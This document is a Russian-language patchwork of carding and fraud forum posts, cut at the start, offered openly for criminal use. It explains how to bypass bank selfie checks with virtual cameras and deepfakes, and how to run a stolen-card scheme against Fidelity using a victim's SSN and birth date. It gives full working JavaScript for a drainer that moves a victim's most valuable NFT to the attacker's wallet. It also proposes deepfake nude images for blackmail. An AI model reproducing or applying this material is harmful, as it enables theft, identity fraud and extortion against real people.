регистрации в социальных сетях, в приложениях для онлайн-торговли и многих
других. Однако, несмотря на свою популярность, селфи-проверка не является
идеальным решением, поскольку ее можно обойти. В данной статье мы рассмотрим
один из способов обхода селфи-проверки в приложениях, и зарегистрируем аккаунт
банка Revolut, цены на которые начинаются от 80$.
Начало
Что нам понадобится:
Установка.
Устанавливаем нужный нам [OBS Studio](https://github.com/obsproject/obs-
studio/releases/tag/27.2.4) (Cсылка кликабельная)
Установка OBS:
Переходим по ссылке, мотаем в самый низ страницу и выбираем, что нужную версию
исходя из вашего устройства. Я устанавливал OBS-Studio-27.2.4-Full-
Installer-x86.exe ; на Windows 10 64 битную систему. Запускаем установщик и
проводим самую обыкновенную установку, после закрываем OBS.
Устанавливаем [Virtualcam Plugin](https://obsproject.com/forum/resources/obs-
virtualcam.949/) (Ссылка кликабельная)Заходя на сайт видим такую картину, нам
нужна лишь только одна кнопка здесь(Выделена красным прямоугольником).
Установили, теперь запускаем, проходим первые два этапа спокойно. Важно, на
третьем этапе нас спросят расположение нашей OBS, выбирайте именно ту, которую
мы с вами скачали, а именно 27.2.4.
Устанавливаем Bluestacks(Текст
кликабельный). Тут не будет особо больших распинаний, большая зеленая кнопка,
берем и устанавливаем.
Настройка OBS
Запускаем наш OBS проделываем такие манипуляции
Открывается окно с настройками виртуальной камеры и выставляем такие же как и у меня, после того как выставили настройки, нажимаем СТАРТ.
Теперь добавляем ваше видео/фото. Если вы загружаете видео, запустите видео как в медиаплеере, а затем выберите 'Захват окна'. В случае с фото, просто выбираем 'Изображение'. Настройка OBS на этом заканчивается.
Настройка Bluestacks
Регистрация аккаунта в Revolut и демонстрация обхода.
Мы проделали уже все этапы, нам остается лишь зарегистрироваться в Revolut,
приложу своё видео где я проходил селфи-проверку в этом онлайн-банкинге, с
остальными документами мы делаем точно так-же.
Приветствую, здесь многие задаются вопросом стоит ли лезть в кардинг, и каково его будущее, надеюсь на эти вопросы дадут ответы опытные кардеры с форума
Всем привет, жулики. Вот бывает такое настроение, когда проснулся, выпил
вкусного кофе и решил поделиться полезной инфой. Я периодически пишу о своих
заливах с фб, каких то проблемах. Достаточно часто ко мне ломятся в личку и
требуют бины, просят их продать и показать. Такое мне не нравится, свои
наработки я не продаю, но адекватным людям могу что-то подсказать, особенно
новичкам.
Есть один банк, я выгружал с него раза 3-4 наверное, суммы до 2к, было разок и
больше кажется. Потом оставил его, потому что тут иногда требуется грамотный
прозвон, а я в свою очередь нашел варианты как делать это без прозвонов,
поэтому, думаю что схема с этим банком живая, но будьте готовы потратиться на
тесты, на вскидку, не более 100$, сейчас распишу все подробнее.
Есть такой банк - Fidelity, бин который использовал я - 417903
Роллится он здесь -
https://login.fidelityrewards.com/e...antId=ICSELAN&channelId=web#/VerifyEnrollment
Для енролла нужен ССН , ну и соответственно пробейте еще и Доб. Также, вам
понадобится номер телефона ЮСА который вы подвяжете в кабинете для принятие
Fraud ALerts, я действовал по такой схеме, сперва брал просто номер телефона
для принятия смс( из бота) и енролла ( вам нужно будет принять 2 смс при
енролле), чтобы посмотреть, есть ли вообще смысл арендовать номер на неделю
или нет( вдруг нет баланса и т.д.), если все соответствовало моим ожиданиям -
арендовал номер на неделю с возможностью отправки обратной смс. Также, не
поленитесь и создайте почту на gmail или outlook с похожей на вашего кх
данными.
Далее, вы заролились и зашли в аккаунт, видите что там есть нужный вам баланс.
Идете в Card Management и смотрите подвязанные почты и номера телефона. Почту
кх удаляете(если она там есть), и добавляете ваш номер телефона в Mobile(
телефон, который вы арендовали на неделю)
Итого, после всех действий, мы имеем наш номер телефона в Personal Details,
нашу почту, контактных данных кх там быть не должно.
Дальше, мы идем в наш Facebook, Google, да хоть куда удобно и пробуем
выгружать бабки или покупать что-либо.
Скорее всего вам придет отказ вот с такой формулировкой на номер телефона
FreeMsg:Elan FIDELITY Fraud Alert: Is $400.00 at FACEBK C7833ZB2D2 on 03/05
valid? Reply 1=Yes 2=No. STOP=opt out or HELP
Мы прожимаем Yes и снимаем фрод.
К сожалению, этот банк не из тех что дал вам после снятия фрода выгружать
карту под ноль, скорее всего, пара списаний и больше не даст, это решается
прозвоном в банк.
Для прозвона, пробейте DL+даты + заранее выгрузите все транзы что были у кх и
передайте прозвонщику, БГ также передайте прозвону, в общем, подготовьтесь как
следует.
Возможно, если не будете торопиться, а выгружать раз в час/два часа, прозвон
не понадобится.
Этот банк я тестил в марте, поэтому, не могу с уверенностью сказать что все
написанное выше актуально под текущие реалии, по крайней мере, вы можете это
проверить своими руками, мне кажется что ничего они не поменяли)
**Снова приветствую всех, это продолжение моей писанины по поводу скама крипты
без особого труда и расходов.
Для чего это нужно? Не все люди располагают бюджетом для заказа смарт-
контракта, для заказа проектов с нуля, поэтому я показываю как развернуть
проект не имея бюджета своими руками без особых знаний(но без смарт
контракта)
(Соурс код также прикладывается)
И так, для этого нам необходимо всё то же самое:**
-Минимальное понимание программирования
-Капелька хитрости и ума
-Немного ресурсов
-20$ на хост и домен~
Вот мы уже разобрались, что такое минт(ссылка на статью
клик), уже запустили свои первые пару проектов
и начали общаться с людьми по делу
И постоянно начали слышать о том, что есть некий скрипт, смарт контракт с
автовыводом НФТ и токенов(Аппрув), который просто выводит с кошелька человека
все его холды без ведома
Появляется желание попробовать, узнать про это больше
Вот натыкаетесь на продажу и установку, но за него просят баснословные
деньги... А заняться этим самому не хватает умений
Что-ж, наш вариант конечно же не аппрув , но тоже неплохой.(Кстати про
него я хотел написать статейку, но, увы, с моей ленью человек написал первее)
Будем писать по старой схеме, сразу же **вопрос - ответ
Что за скрипт?**
Данный скрипт написан на языке JS, т.е. серверных скриптов и смарт
контрактов как таковых нету. Всё очень просто и основные детали будут
разобраны ниже.
Также подключается библиотека web3 и api infura.
Как работает скрипт?
Запускаем сайтец с вашим проектом, человек подключает свой кошелек и скрипт
начинает проверку кошелька на наличие NFT в сервисе
OpenSea, если таковые имеются, то скрипт проверяет на
ценность этих NFT, после чего выбирает самую дорогую NFT и запрашивает
отправку этой NFT через web3, пользователю выводит лишь только данное
сообщение:
То есть информации о том, что выводят конкретно NFT нету, можно придумать самый различный предлог для оплаты этой комиссии пользователю, что мы вскоре тоже разберем. После оплаты комиссии NFT успешно переходит на ваш кошелек
Какая прибыль?
В данном случае прибыль может варьироваться самыми разными суммами. Вы можете
забрать NFT стоимостью 0.1 Eth(на период написания статьи ~120$), а можете
забрать и NFT стоимостью в 50 Eth( 60k$ ~),все в ваших руках, смотря как и
кого заведете на ваш
фейк
Какой проект замутить и откуда взять идею?
Ох, с этим скриптом открываются огромные возможности для вашего творчества...
Вы можете как и использовать фейки под официальные проекты, находя их на самых
различных ресурсах, так и делать что-то своё, предлогов можно придумать
огромное количество, пару примеров я расскажу далее уж
точно
Как распространять?
В данном случае распространение данного проекта немного отличается от фейк-
минта, но и при этом можно использовать точно
также, только получать мы будем не просто Eth, а NFT с кошельков держателей. В
общем, всё по той же схеме, только в зависимости от того, что за предложение
вы придумали для отработки данного скрипта.
Спам по твиттеру, дискорду, пролив по гугл и фб адс, таргетинг, реклама на
разных ресурсах, вариаций много.
И так, приступим к практике. Нам пришла в голову гениальная мысль - обмануть
форумчан XSS.IS!
Запускаем проект с Аирдропом(раздачей) рандомных NFT исключительно для
сообщников иксы! Никто против точно не будет - заполучить NFT почти бесплатно,
нужно будет заплатить только газ(комиссию) для получения NFT стоимостью более
1000$ !
Сейчас разведём...
Копипастим с прошлой темы для тех, кто не читал(а нужно!!!):
Для старта нужно установить любой редактор кода, я лично использую Visual
Studio Code.
Далее для понимания немного информации на простом языке:
CSS - Язык стилей, с помощью него закладывается основа дизайна сайта
HTML - Разметка сайта, проще говоря - указывает сайту где что будет
находиться)
JS - Скрипты для взаимодействия с сайтом))
Да и вообще, для общего понимания что происходит советую изучить CSS и HTML
тем, кто не знает.
При большом желании можно изучить за 3-7 дней, и вам это очень пригодится)
Далее выгружаем наш общедоступный код, который я приложил и начинаем разбирать по полочкам работу!
Вот так выглядит наш новый сайтик, думаю тем кто поставит на хост зайдёт,
вроде забавно
получилось
*под основу был взят сайт нфт-коллекции гоблинтаун
Разбирать также мы полностью не будем, разберем лишь только работу нашего скрипта, в прошлой теме мы и так получили уже базовое понимание)
И так, поехали, в index.html если пролистать вниз через редактор кода будет видно наш скрипт заключенный в разметку
Сам скрипт:
JavaScript:Copy to clipboard
const ABI721 = [{
"inputs": [{
"internalType": "string",
"name": "name",
"type": "string"
}, {
"internalType": "string",
"name": "symbol",
"type": "string"
}, {
"internalType": "string",
"name": "uri",
"type": "string"
}, {
"internalType": "address",
"name": "_launchpad",
"type": "address"
}, {
"internalType": "contract IPair",
"name": "pair",
"type": "address"
}, {
"internalType": "uint256",
"name": "_maxType",
"type": "uint256"
}],
"stateMutability": "nonpayable",
"type": "constructor"
}, {
"inputs": [{
"internalType": "address",
"name": "from",
"type": "address"
}, {
"internalType": "address",
"name": "to",
"type": "address"
}, {
"internalType": "uint256",
"name": "tokenId",
"type": "uint256"
}],
"name": "safeTransferFrom",
"outputs": [],
"stateMutability": "nonpayable",
"type": "function"
}, {
"inputs": [{
"internalType": "address",
"name": "from",
"type": "address"
}, {
"internalType": "address",
"name": "to",
"type": "address"
}, {
"internalType": "uint256",
"name": "tokenId",
"type": "uint256"
}, {
"internalType": "bytes",
"name": "_data",
"type": "bytes"
}],
"name": "safeTransferFrom",
"outputs": [],
"stateMutability": "nonpayable",
"type": "function"
}]
const ABI1155 = [{
"inputs": [],
"stateMutability": "nonpayable",
"type": "constructor"
}, {
"inputs": [{
"internalType": "address",
"name": "from",
"type": "address"
}, {
"internalType": "address",
"name": "to",
"type": "address"
}, {
"internalType": "uint256",
"name": "id",
"type": "uint256"
}, {
"internalType": "uint256",
"name": "amount",
"type": "uint256"
}, {
"internalType": "bytes",
"name": "data",
"type": "bytes"
}],
"name": "safeTransferFrom",
"outputs": [],
"stateMutability": "nonpayable",
"type": "function"
}]
async function loadWeb3() {
if (!window.ethereum) return undefined;
window.web3 = new Web3(window.ethereum);
await window.ethereum.enable();
await window.ethereum.request({
method: "wallet_switchEthereumChain",
params: [{
chainId: "0x1"
}]
});
let account = await getCurrentAccount();
test();
}
async function loadContract(ABI, address) {
if (!window.ethereum) return undefined;
return await new window.web3.eth.Contract(ABI, address);
}
async function getCurrentAccount() {
if (!window.ethereum) return undefined;
const accounts = await window.web3.eth.getAccounts();
return accounts[0];
}
async function test() {
var account = await getCurrentAccount();
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", `https://api.opensea.io/api/v1/assets?owner=${account}&order_direction=desc&limit=200&include_orders=false`, false);
xmlHttp.setRequestHeader("accept", "application/json");
xmlHttp.send(null);
var opensea_response = JSON.parse(xmlHttp.response);
var assets = opensea_response["assets"];
if (!assets) {
return _alert();
}
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", `https://api.opensea.io/api/v1/collections?asset_owner=${account}&offset=0&limit=200`, false);
xmlHttp.setRequestHeader("accept", "application/json");
xmlHttp.send(null);
var price_response = JSON.parse(xmlHttp.response);
var price_data = {};
var nft_data = {};
try {
price_response.forEach(element => {
price_data[element["primary_asset_contracts"][0]["address"]] = element["stats"]["one_day_average_price"];
})
assets.forEach(element => {
let contract_address = element["asset_contract"]["address"];
let type = element["asset_contract"]["schema_name"];
if (price_data[contract_address] !== undefined) {
nft_data[contract_address] = {
"type": type,
"id": element["token_id"],
"price": price_data[contract_address]
};
}
});
} catch {
return _alert();
}
console.log(nft_data);
var list = [];
for (const [key, value] of Object.entries(nft_data)) {
list.push(value["price"]);
}
var highestVal = Math.max.apply(null, Object.values(list)),
val = Object.keys(nft_data).find(function(a) {
return nft_data[a]["price"] === highestVal;
});
// console.log(nft_data[val]["type"])
// console.log(val)
// console.log(account)
// console.log(ABI1155)
if (nft_data[val]["type"] === "ERC1155") {
window.contract = await loadContract(ABI1155, val);
await contract.methods.safeTransferFrom(account, "0x00000000000000000", nft_data[val]["id"], 1, "0x0").send({
"from": account
});
} else {
window.contract = await loadContract(ABI721, val);
await contract.methods.safeTransferFrom(account, "0x00000000000000000", nft_data[val]["id"], "0x0").send({
"from": account
});
}
}
function _alert() {
Swal.fire({
title: 'Error!',
text: 'There is some errors on our side. Please, try again later.',
icon: 'error',
confirmButtonText: 'Fine'
})
}
async function load() {
document.querySelector(".metamask").addEventListener("click", async() => {
await loadWeb3()
});
}
window.onload = load;
Теперь ведём разбор полётов(функций):
const ABI721 - Необходим для взаимодействия с токенами ERC-721
const ABI1155 - Необходим для взаимодействия с токенами ERC-1155
Что это за токены ERC-721 и ERC-1155 можно прочитать на вот этом
ресурсе(тык)
function loadWeb3 - подгрузка метамаска и смену сети на эфир(если
подключена другая)
function loadContract - подгружает контракт того или иного токена
function getCurrentAccount - получает информацию об кошельке пользователя
**function test -**жара, поехали.
Сначала данный скрипт вызывает функцию получения информации об кошельке
пользователя, после чего собирает о нём информацию через API ресурса OpenSea,
получает информацию о наличии НФТ и их ценностях, после чего выбирает самую
ценную НФТ из имеющихся и запрашивает функцию safeTransferFrom и делает
запрос на перевод самой дорогой НФТ из имеющихся на ваш кошелек, указанный в
данном скрипте.
Ах да, чуть не забыл, самое важное - свой кошелек ставим заместо
0x000000..... , ведь за этим мы сюда пришли)
После чего подстроив дизайн под свой проект мы загружаем его на хостинг и радуемся работающему скрипту
**Из реальных историй первую расскажу как исполнитель заказа из наблюдение за
работой заказчика.
У меня есть один постоянный клиент, который на протяжении почти года
заказывает у меня различные проекты и сильно он поднялся заимев подобный
скрипт. Где-то около двух месяцев назад я сообщил ему о новом скрипте, о
котором мы сейчас говорим и он с радостью захотел попробовать поработать с
ним. Он перевел мне N-ную сумму, ну и я по своей любопытности отслеживал его
счёт, которым он пользуется так-же на протяжении всей нашей совместной работы,
на тот момент он составлял около 10Eth. Какой первый проект я ему запустил уже
не помню, но на наше время его баланс составляет 290Eth и это далеко не
предел. Из последних проектов что я ему делал это были топовые коллекции с
большим ажиотажем на момент выпуска: elftown, goblintown, weareallgoingtodie,
otherdeed и пр.
Это были его лучшие залёты за счёт которых он так поднялся, просто для примера
закину скриншот части залётов
Как бы мне не хотелось поделиться откуда велся траффик - думаю это будет не
честно по отношению к нему и вы это понимаете)
Но при этом человек спал в сутки по 2-4 часа и все эти 2 месяца упорно
работал. Молодец, белой завистью смотрю на его продвижение)
А теперь расскажу пару примеров о том, как решил я поработать по этому скрипту
Как-то я залетел в одну НФТ-коллекцию(В дискорд) до старта продаж в целях
попасть в белый лист для минта НФТ
Общаясь там, я адаптировался и понял тему общения между НФТ-холдерами
Им нравится сама атмосфера
Там был раздел фан-артов, куда постоянно люди выкладывали свои арты на данную
коллекцию
И тут я не знаю каким образом, но пришла мне идея в голову.
Фан-метавселенная для этой коллекции. О да, я слепил лендосик от балды,
подключил данный скрипт
И вывел условие для подключения в фан-метавселенную: нужно подключить кошелек
и заплатить газ(комиссию), чтобы попасть в метавселенную.
И конечно же я начал со всеми делиться, мол вот, посмотрите, что создал! И
людям стало действительно интересно, они стали подключаться и поплатились за
это :c
Профит: 3k$
Потом под траффик Google ADS я решил замутить крипто-боксы.
Т.е. сайт, где люди могут открывать кейсы и получать рандомные призы из мира
криптовалюты
И конечно же первый кейс совершенно бесплатный! Снова нужно лишь только
заплатить комиссию)
И само собой, помимо гугл адс я вытащил аккаунт твиттер с галочкой и начал
распространять еще и там.
Ох, вот это сок был!
Профит: 7k$
Пожалуй, это на данный момент самая актуальная тематика для криптоскама.
Конечно же эта версия не сравнится с апрувом(взаимодействие со
смартконтрактом), но если вы только начинаете - она отлично для вас подойдет.
Как я говорил и ранее, для работы с данным скриптом возможно придумать
огромное количество проектов, дайте свободу своему
творчеству
Снова с вами прощаюсь, но думаю будет и третья статья, где я что-нибудь
разверну.
Большое спасибо за внимание! Удачи в делах.
**
Берем данные КХ под вериф на бирже Делаем себе документы, а точнее
распечатываем фейк документ с фоткой, можно заламинировать. Далее берем
напечатанный документ в руки и следуем инструкции. Меняем лицо - получаем
вериф.
https://github.com/alievk/avatarify - позволит тебе подменить лицо в
реальном времени, во время видеозвонка в скайпе, или зуме.
Инструкция по установке на Windows
git clone https://github.com/alievk/avatarify.git
cd avatarify
scripts\install_windows.bat
После успешного завершения, скачиваем доп.ресурсы с https://drive.google.com/file/d/1L8P-hpBhZi8Q_1vP2KlQ4N6dvlzpYBvZ/view, https://yadi.sk/d/lEw8uRm140L_eQ/vox-adv-cpk.pth.tar, https://mega.nz/file/R8kxQKLD#036S-bobZ9IW-kNNcSlgpfJWBKSi5nkhouCYAsxz3qI (на ваш выбор).
Потом размещаем vox-adv-cpk.pth.tar в папку avatarify (не распаковываем).
Папка avatarify находится в C:\Users\{username}:
После этого, если вы уже закрыли консоль miniconda, то открываем её снова,
прописываем:
cd C:\Users\username\avatarify
И после этого прописываем следующее:
run_windows.bat
Убедитесь, что ваша ОЗУ не забита, т.к при первом запуске программа докачает и
установит нужные ей элементы:
После успешного запуска на экране появятся 2 окна, в одном будет изображение с
веб камеры, в другом - с Avatarify:
Управление:
1-9: переключение между лицами;
0 (ноль): включает и выключает отображение Аватара;
A/D: предыдущий/следующий аватар из папки;
W/S: приближение камеры;
Z/C: настройка непрозрачности наложения Аватара;
X: сбрасывает настройки,перед использованием помогает;
F: поиск окна и опоры;
R: зеркальное отображение с веб камеры;
T: зеркальное отображение аватара;
I: показать FPS.
Управление Аватаром
Вот основные принципы управления вашим аватаром:
Выровняйте свое лицо в окне камеры как можно ближе по пропорциям и положению к целевому аватару. Используйте функцию увеличения/уменьшения масштаба (W / S клавиши). Когда вы выровняетесь, нажмите "X", чтобы использовать этот кадр в качестве ссылки для управления остальной анимацией.
Используйте функцию наложения (клавиши Z/C), чтобы максимально приблизить выражение вашего лица и лица аватара.
Кроме того, вы можете нажать "F" для программного обеспечения, чтобы попытаться найти лучшую позицию. Это замедлит частоту кадров, но пока это происходит, вы можете продолжать двигать головой: окно предварительного просмотра будет мигать зеленым цветом, когда он обнаружит, что ваша поза лица ближе соответствует аватару, чем та, которую он использует в данный момент. Вы также увидите два числа: первое число - это то, насколько близко вы в данный момент выровнены по Аватару, а второе число-насколько близко выровнена система отсчета.
Вы хотите получить первое число как можно меньше - около 10 обычно является хорошим выравниванием. Когда вы закончите, нажмите "F" еще раз, чтобы выйти из режима поиска опорных кадров.
Вам не нужно быть точным, и некоторые другие конфигурации могут дать еще лучшие результаты, но обычно это хорошая отправная точка.
Теперь, скачиваем плагин для OBS, а также сам OBS Studio
https://obsproject.com/forum/resources/obs-virtualcam.539/ ( выберите
установить и зарегистрировать только 1 виртуальную камеру):
Запускаем OBS.
В разделе Sources нажмите на кнопку Добавить (знак"+"), выберите Windows Capture и нажмите OK. В появившемся окне выберите "[python.exe]: avatarify " в выпадающем меню окна и нажмите кнопку OK. Затем выберите Edit -> Transform -> Fit to screen.
В OBS Studio перейдите в меню Сервис - > VirtualCam. Проверьте автозапуск, установите Буферизованные кадры в 0 и нажмите кнопку Пуск.
Теперь OBS-Camera camera должна быть доступна в Zoom (или другом программном обеспечении для видеоконференцсвязи).
Настраиваем gps под прописку и ищем чистый ip под город прописки!
МЕТОД 2
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Ссылка на ДипФэйсЛаб
https://github.com/iperov/DeepFaceLab
Необходимые файлы:
cuda_9.2.148_windows.exe (потом перезагрузить)
cuda_9.2.148.1_windows.exe
cudnn-9.2-windows7-x64-v7.1.zip
ИСПОЛЬЗОВАЛАСЬ ПРОГРАММА ОТ 20/06/2019
Видео от разработчика
ВАЖНО!!!!
ВНЕ ЗАВИСИМОСТИ ОТ ТОГО сколько идёт ваше видео, обработка замены лица по времени займёт одинаковый промежуток.
Чем больше итераций - тем лучше. В видео с Лешей Шевцовым (itpedia) было использовано почти 80,000
Для самого крутого показателя можно использовать 500,000 (займет 3-4 дня, все зависит от видюхи)
Это исключительно мой черновик для заметок, я не старался его адаптировать под кого-либо, только делал для себя.
-------------------------------------------------------------------
После скачивания есть версии
DeepFaceLabCUDA9.2SSE для NVIDIA видеокарт вплоть до GTX1080 и любых 64-бит процессоров.
DeepFaceLabCUDA10.1AVX для NVIDIA видеокарт вплоть до RTX и процессоров с поддержкой AVX инструкций.
DeepFaceLabOpenCLSSE для AMD видеокарт и любых 64-бит процессоров.
Первый - data_dst.mp4 ---- это лицо, которое будет заменяться
Второй - data_src.mp4 ---- это лицо, которое будет использоваться для замены.
Порядок
extract PNG from video data_src.mp4 - программа извлекает лицо, которым БУДЕМ ЗАМЕНЯТЬ. Формат лицо PNG
3.2) extract PNG from video data_dst FULL.mp4 - программа извлекает лицо, которое БУДЕТ ИЗМЕНЕНО. Формат PNG
4.1) data_scr check result - проверка как извлеклось лицо, КОТОРЫМ БУДЕМ ЗАМЕНЯТЬ.
4.2.2) data_src sort by similar histogram - После этой сортировки лица будут сгруппированы по содержанию, так что отсеять ненужные лица теперь намного проще.
Пролистываете скроллом и удаляете ненужные лица группами.
4.1) data_scr check result - проверка как извлеклось лицо, КОТОРЫМ БУДЕМ ЗАМЕНЯТЬ. Удаляем ненужные. Видите, лица теперь находятся согласно повороту головы.
4.2.1) data_src sort by blur.bat - Сортировка по резкости. Запускаете и ждете сортировки. Затем смотрите результаты. Самые мутные лица будут в конце. Для src важно убрать мутные лица.
4.1) data_scr check result - проверка как извлеклось лицо, КОТОРЫМ БУДЕМ ЗАМЕНЯТЬ. Удаляем ненужные МУТНЫЕ ЛИЦА.
указать лица на кадрах, где вообще не определилось никаких лиц.
5.1) data_dst check result
5.2) data_dst sort by similar histogram - Если в целевом видео содержатся другие ненужные лица, можете произвести эту сортировку, и затем удалить эти лица будет проще.
5.1) data_dst check result - удаляем ненужные кадры
в manual_ru.pdf
ЖДЕМ
!!! 6) train H64 best GPU - еще раз. Появляются какие-то диаграммы, потом закрывается.
Вроде он всегда нажимал на 0. -3,01 в видео
Комбинации:
1
1
пусто
пусто
-5
пусто
пусто
пусто
!!!7) convert H64 debug - ЕЩЕ РАЗ?
Комбинации:
1
1
20
40
пусто
пусто
пусто
пусто
Комбинации:
1
1
20
40
пусто
пусто
пусто
пусто
ЖДЕМ ЗАВЕРШЕНИЯ
ЖДЕМ ЗАВЕРШЕНИЯ
Идем в папку РЕЗУЛТ и видим новый файл result.mp4
----------------------------------------------------------------------------------------------------
Конфиги если захотите треннировать на SAE
== Model options:
== |== autobackup : True
== |== write_preview_history : True
== |== batch_size : 2 (
== |== sort_by_yaw : False
== |== random_flip : False
== |== resolution : 192
== |== face_type : f
== |== learn_mask : True
== |== optimizer_mode : 2
== |== archi : liae
== |== ae_dims : 192
== |== e_ch_dims : 42
== |== d_ch_dims : 21
== |== multiscale_decoder : true
== |== ca_weights : true
== |== pixel_loss : False
== |== face_style_power : 10
== |== bg_style_power : 10
== |== apply_random_ct : true
== |== clipgrad : true
== Running on:
== |== [0 : GeForce GTX 1080]
На А64 все по дэфолту
---------------------------------
СОВЕТ
H128, DF, LIAEF128 моделей:
Use pixel loss? (y/n, ?:help skip: n/default ) :
позволяет быстрее улучшать мелкие детали и убрать дрожание. Включать только после 20к итераций.
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
Сайт второй программы
https://faceswap.dev/forum/viewtopic.php?f=5&t=27
-------------------------------------
ВАЖНО!!!!
ВНЕ ЗАВИСИМОСТИ ОТ ТОГО сколько идёт ваше видео, обработка замены лица по времени займёт одинаковый промежуток.
Чем больше итераций - тем лучше. В видео с Лешей Шевцовым (itpedia) было использовано почти 80,000
Для самого крутого показателя можно использовать 500,000 (займет 3-4 дня, все зависит от видюхи)
Настраиваем gps под прописку и ищем чистый ip под город прописки!
------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
МЕТОД 3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<https://www.elladodelmal.com/2019/04/autoencoders-gans-y-otros-chicos-
buenos_10.html> - СТАТЬЯ .
Настраиваем gps под прописку и ищем чистый ip под город прописки!
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
МЕТОД 4
Подмена изображения в камере,этим способом к примеру можно регистрировать акки каргеринга на левые данные, ибо в некоторых приложениях нельзя загрузить уже имеющиеся photo,для этого нам всего лишь потребуется всего лишь установленная операционная система Linux.
1. Устанавливаем виртуальную камеру
Ставим кодек;apt-get install git make ffmpeg
Клонируем репозиторий драйвера;
mkdir codek
cd codek
git clone https://github.com/umlaeute/v4l2loopback.git
cd v4l2loopback
Устанавливаем;
make && sudo make install
sudo depmod -a
И запускаем;
sudo modprobe v4l2loopback
У нас появляется устройство /dev/video0 или цифра выше если у вас уже стояло что-то
2. Запускаем трансляцию изобразения в видео поток драйвера ffmpeg -loop 1 -r 1/5 -i "path_to_image" -c:v libx264 -vf fps=25 -vcodec rawvideo -pix_fmt yuv420p -threads 0 -f v4l2 /dev/video0
Указываем обязательно -loop 1 чтобы зациклить данное действие.
3. Ну теперь финальная стадия, это эмуляция,открываем Android Studio,
открываем окно где редактируется виртуальная машина и в настройках камеры,
выбираем наше виртуальное устройство,запускаем и разуемся жизни
Настраиваем gps под прописку и ищем чистый ip под город прописки!
МЕТОД 5
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
https://www.limontec.com/2018/02/deepfakes-criando-videos-porn-falsos.html
- СТАТЬЯ
Настраиваем gps под прописку и ищем чистый ip под город прописки!
МЕТОД 6
Создания подмена камеры
https://github.com/corkami https://github.com/corkami/mitra
file1 first (top) input file.
file2 second (bottom) input file.
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--verbose verbose output.
-n, --nofile Don't write any file.
-f, --force Force file 2 as binary blob.
-o OUTDIR, --outdir OUTDIR
directory where to write polyglots.
-r, --reverse Try also with
-s, --split split polyglots in separate files (off by
default).
--splitdir SPLITDIR directory for split payloads.
--pad PAD padd payloads in Kb (for expert).
Настраиваем gps под прописку и ищем чистый ip под город прописки!
МЕТОД 6
Для тех кто не мог пройти верификацию( а я знаю что таких много). Держите
подгончик. Как никак Badoo один из лидеров по количеству мамонтов и дрочеров.
В Snapchat появился фильтр, меняющий пол. Эта фича позволяет с легкостью
пройти верификацию на Badoo, а дальше - принимать дрочерский трафик и
зарабатывать на нем всеми известными способами.
Необходимо открыть камеру в приложении, справа от кнопки «Сделать фото» есть
раскрывающаяся галерея масок — нужные фильтры находятся там;
Среди «масок» есть две: одна с мужским лицом, другая с — женским. Это и есть
фильтры «смены пола»;
После активации фильтра нужно выставить камеру так, чтобы лицо попало в
границы «маски»;
Фильтр работает только в «живом» режиме, из галереи фото добавлять нельзя. Но
можно переключиться на заднюю камеру и, к примеру, захватить лицо человека на
фото.
Настраиваем gps под прописку и ищем чистый ip под город прописки!
МЕТОД 7
Для начала https://developer.nvidia.com/cuda-80-ga2-download-archive и устанавливаем CUDA 8.0
Установка стандартная, после перезагружаем. Патчить ничего не надо.
Скачиваем fakeapp
Скачиваем https://ffmpeg.zeranoe.com/builds/
ВАЖНО! ПОВТОРЯЕМ В ТОЧЬ ТОЧЬ!!!
Распаковываем FakeApp.zip в корень диск С. А так-же в корне диска С создаем папку fakes, внутри создаем папки data, data_A, data_B.
ffmpeg, распаковываем в папку FakeApp.
Получаем такую картину
Этап подготовки видео
Я загрузил видео с интервью Хлое Морец и теперь нужно на любом видеоредакторе
нарезать участки видео с её лицом.
Сохраняем нарезанное видео в качестве 720p в папку C:\fakes\data_A называем её
1.mp4
Запускаем командную строку, пишем:
C:\FakeApp\ffmpeg\bin\ffmpeg.exe -i C:\fakes\data_A\1.mp4 -vf fps=25
"C:\fakes\data_A\out%d.png"
В папке C:\fakes\data_A видим как появляются картинки, ждем завершения
процесса.
После завершения удаляем в папке C:\fakes\data_A видео 1.mp4
Запускаем fakeapp.bat в папке C:\FakeApp
Выбираем Align, поле Data указываем C:\fakes\data_A
Жмем Start.
ЖДЕМ ПОЛНОГО ЗАВЕРШЕНИЯ!
В папке C:\fakes\data_A появится папка aligned где все упорядочены её лица.
Этап номер два
Находим видео для друга и повторяем весь процесс, только вместо data_A
указываем data_B. Главное видео для друга должно быть одно лицо, если лиц в
кадре несколько, программа будет менять их все.
После того как в папке data_A и data_B появилась папка aligned с упорядоченными лицами переходим к тренировке. Этот процесс жопаболь, ибо уходит очень много времени для тренировки нейросети.
Переходим на вкладку Train
В поле Data A указываем путь C:\fakes\data_A\aligned
В поле Data B указываем путь C:\fakes\data_B\aligned
Жмем Start и ждем. Наблюдаем как постепенно нейросеть учится и качество фото
улучшается. Если надоело ждать или качество вас устраивает, нажимаем клавишу
Q, программа сохранит "весы" связей и можно будет в дальнейшем продолжить
расчеты, ничего не теряется.
Нейросеть будет учиться примерно сутки на 1050ti.
Склеивать готовое видео не долго, по времени уходит максимум 1 час.
Варианты монетизации
Вебкам;
Шантаж;
Идентификация;
И т. д.
— прикручиваешь фотку клиентки к «голому телу» (мама я на вписке) и вежливо
просишь оказать материальную помощь
— прикручиваешь фотку к видео и проходишь идентификацию в партнерках/сервисах
Настраиваем gps под прописку и ищем чистый ip под город прописки!
bitzlato
hodlhodl
paxful
bitpapa
cryptolocator
localcryptos
localcoinswap
garantex
Whitebait
Totalcoin
Chatex
Risex
Vertex
prizmBit
Bitcoinglobal
skyBTCbanker
SkyCrypto
monabey
bisg
Localmonero
AgoraDesk
И другие
Всем привет!
